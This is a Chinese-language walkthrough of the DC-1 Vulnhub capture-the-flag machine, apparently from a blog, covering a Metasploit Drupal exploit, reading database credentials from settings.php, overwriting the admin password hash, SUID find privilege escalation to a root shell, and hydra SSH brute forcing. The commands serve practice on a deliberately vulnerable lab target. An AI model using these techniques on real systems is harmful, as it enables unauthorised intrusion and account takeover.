【CTF】靶机:DC-1

简介: 本靶机适合初学者进行练习,适合已经了解渗透流程,有整体思路的初学者进行学习。本文将从头讲解,并配有视频教程。

靶机下载地址
https://pan.baidu.com/s/1wABv88zDc5lpjhCWvBhvfg 
提取码:5yq7
复制这段内容打开「百度网盘APP 即可获取」
视频教程可以去B站找我
https://www.bilibili.com/video/BV1xN4y1V7Kq?spm_id_from=333.999.0.0&vd_source=5eafc44fe61140563af1835db061815b

DC-1安装非常简单,下载后将.ova 文件导入虚拟机即可
101

注意导入后将虚拟机的网络模式由桥接模式改为NAT模式

那么,我们开始吧!

首先,我们要找到靶机ip

102

然后进行端口扫描
dc03

我们不妨访问下靶机IP地址,并使用wappalyer识别网站程序为Drupal 7
dc104

随后,我们启用Metasploit进行漏洞搜索,选择较新日期且等级优秀的
dc106

使用我们中意的1号,并查看相关内容

dc107

之后设置被监听主机ip,并进行利用
python -c 'import pty;pty.spawn("/bin/bash")'
获取交互shell
dc109

找到flag1
dc109
flag1提示Every good CMS needs a config file - and so do you.
提示
下一个flag在CMS的config文件里面
经过简单摸索
我们找到了配置文件settings.php
cd110
于是我们在此文件找到了flag2
/**

  • flag2
  • Brute force and dictionary attacks aren't the
  • only ways to gain access (and you WILL need access).
  • What can you do with these credentials?

*/
flag2 提示我们暴力破解并不是获取访问权限的方式
而在flag2下我们看到了数据库信息
于是我们进行连接数据库操作
连接语句为
mysql -u dbuser -pR0ck3t

111dc

之后我们获取数据库敏感信息
select version(); \查看数据库版本
select database(); \查看当前数据库
show databases; \查看数据库信息
use drupaldb; \选定数据库
select database(); \查看当前数据库
show tables; \查看数据库的表
select * from users;
\q \退出
1dc1111

dc11112

下来我们在官网查询到哈希密码的加密文件
https://www.drupal.org/node/1023428
13312
我们利用password脚本对我们需要的密码进行加密
结果出现报错
gs
报错中指出,'/var/www/scripts/includes/password.inc'文件找不到,但是刚才发现,includes目录并不在scripts目录下,因此会报错。
使用命令 cp -r ../includes ./ 复制整个includes目录至scripts目录,再次执行,成功对admin007加密
得到对应密文$S$Dq7ooC2R4E/hC3HIoEBV3Cw1QMRnULsFzAn8M1NaW3OLO9cLeUw9
然后进入数据库更新admin密码
update users set pass='$S$DfBIXCmF.dJ5Ky2bWAMukxpsipRCGvQmXC.jnlUMbGIbySLzw7a0' where name='admin';
之后,成功进入后台,得到flag3
sfb
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
flag3指出: 特殊权限是需要用到 find 和 -exec 命令,也提到了shadow。就是说提权的话,需要用到以上两个命令,以及shadow文件。
于是,我们尝试查看shadow文件,提示权限不够
那么我们开始提权

以find为例

  • -name 按文件名查找
  • -exec 对匹配对象执行的命令,以;结束

但(;)是特殊字符需要转义(\)。
so
find -name 文件名 -exec /bin/sh \;
nb
成功拿到权限
之后我们查看shadow文件

法一:这是我最开始使用的
看到flag4后果断切换到flag4用户
cdflag4
然后就拿到了 flag4
这个方法更简单些,不知道算不算原创小技巧
不过显然这么做绝对不是出题人想看到的,hhh
fina1
ok,拿到finalflag!!!

法二:
下面是官方解法
看到flag4用户后
我们用hydra进行爆破
hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.226.134
nbnb
得到flag4为orange
然后操作思路同法一

目录
相关文章
|
1月前
|
安全 Linux 网络安全
Neos的渗透测试靶机练习——DC-3
Neos的渗透测试靶机练习——DC-3
31 4
|
1月前
|
安全 Shell 网络安全
Neos的渗透测试靶机练习——DC-1
Neos的渗透测试靶机练习——DC-1
37 4
|
1月前
|
安全 Shell 网络安全
DC-2靶机上了解和练习WordPress框架
本文介绍了在一个名为DC2的虚拟环境中进行渗透测试的过程。首先通过扫描发现SSH和Web端口,并进行全端口扫描以寻找隐藏端口。接着通过信息收集、漏洞利用(如SQL注入、文件上传漏洞等)、反弹Shell及提权等步骤逐步攻陷目标系统。文章详细描述了使用Cewl生成字典、Dirsearch扫描目录、Wpscan枚举WordPress用户等技巧,并最终通过SSH登录和Git命令实现了提权,获取多个flag。
|
2月前
|
安全 中间件 Shell
渗透测试-靶机DC-2-知识点总结
渗透测试-靶机DC-2-知识点总结
36 0
|
2月前
|
安全 网络协议 Shell
渗透测试-靶机DC-1-知识点总结
渗透测试-靶机DC-1-知识点总结
41 0
|
安全 Shell 数据库
Vulnhub靶机DC-1渗透笔记
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/
108 2
Vulnhub靶机DC-1渗透笔记
|
存储 SQL 安全
VulnHub靶机DC3渗透笔记
Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战 从靶机DC-3开始,只有一个最终的flag,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:http://www.five86.com/downloads/DC-3-2.zip
130 1
VulnHub靶机DC3渗透笔记
|
存储 网络协议 网络安全
VulnHub靶机DC2渗透测试笔记
靶机下载地址: https://download.vulnhub.com/dc/DC-2.zip 靶机难度:入门 靶机描述:和DC-1 一样,有五个标志,包括最终标志。
84 0
VulnHub靶机DC2渗透测试笔记
|
安全 关系型数据库 MySQL
DC-1靶机渗透(教程以及思路)
DC-1靶机渗透(教程以及思路)
143 0
|
SQL 安全 Shell
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
327 0